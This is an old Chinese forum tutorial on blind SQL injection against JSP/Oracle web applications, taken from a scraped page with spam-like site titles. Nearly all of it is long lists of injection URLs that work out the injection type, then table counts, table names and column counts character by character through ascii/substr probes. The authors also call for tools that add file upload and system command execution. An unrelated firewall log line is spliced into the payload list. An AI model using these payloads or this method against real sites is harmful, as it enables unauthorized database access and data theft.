国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

JSP+ORACLE注入方法整理v1.0
2006-01-23   

大家好 ,我們是pt007和solaris7,QQ:7491805/564935,歡迎高手前來交流:)。
首先感謝華仔和他的朋友Hotkey為大家開發的cnsafersi 注入工具,沒有這個工具就沒有本文,HEHE,本文是對cnsafersi 注入工具抓包后所獲得的數據進行了分析和整理,文章寫的比較倉促,有不足之處歡迎同行指正。另外希望有高手開發出功能更加強大的JSP注入程序,cnsafersi目前僅有select的功能,建議新的JSP注入工具中能加入insert/delete/update/backup/上傳/執行系統命令等功能,可以參考NBSI的功能進行開發。參考文章:《如何開發CnSaferSI》。

首先介紹本文中所使用的工具之JSP注入利器:華仔和他的朋友Hotkey開發的cnsafersi,關于使用方法近期我會寫一個詳細的使用教程:

下面以上圖中的AD表為例來說明JSP+ORACLE注入的過程:

1、 判斷注入類型(數字型還是字符型)
字符型和數字型數據判斷:(希望有人能進一步的細化,細分為數字型和字符型判斷兩部分)

http://www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And user<char(0)
 And user>char(0) And '1'='1
 And user<char(0) And '1'='1 
 And user>char(0) And '%25'=' 
 And user<char(0) And '%25'=' 
http://www.test.net/index_kaoyan_view.jsp?id=117) And user>char(0) And 1 in(1 
http://www.test.net/index_kaoyan_view.jsp?id=117) And user<char(0) And 1 in(1 
) And user>char(0) And (' ')=(' 
) And user<char(0) And (' ')=(' 
http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)
http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)<str(97)
 And str(98)>str(97) And '1'='1 
 And str(98)<str(97) And '1'='1 
 And str(98)>str(97) And '%25'=' 

 And user<char(0) And '%25'= 
 And str(98)<str(97) And '%25'=' 
http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1 
http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)<str(97) And 1 in(1 
) And str(98)>str(97) And (' ')=(' 
) And str(98)<str(97) And (' ')=('

出現正常的頁面:
http://www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And USER<CHR(0)
2、 猜解表數量和表名

數據庫數量為3:

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) http://www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0)

以下為猜解數據表數量
數據表第一位為:1

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))


數據表第二位為:3

http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

數據表第三位為:1
http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))


共有131個數據表,見上圖。

以下為猜解表名稱:
以下為判斷第一個表的長度為:2

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)


以下為判斷第一個表的第一位值為:A

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))


以下為判斷第一個表AD的第二位值為:D

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))


以下為判斷第二個表的表ADER的表名長度為:4

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)


以下為判斷第二個表ADER第一位的值為:A

http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))


以下為判斷第二個表ADER第二位的值為:D
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))


以下為判斷第二個表ADER第三位的值為:E
http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))


以下為判斷第二個表ADER第四位的值為:R

http://www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

以下為判斷第三個表的表名長度為:

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)


3、 猜解列名長度和列名:
a) 以下為猜解字段長度為:2位

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)


 列名長度為:10位以上
以下猜解列名的長度的第一位為:1(十位)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))


以下猜解列名長度的第二位為:0(個位)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
Informational 10/12/2005 15:03:25 Suspect event: ICMP Time Exceeded (> 1 for 1 seconds)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
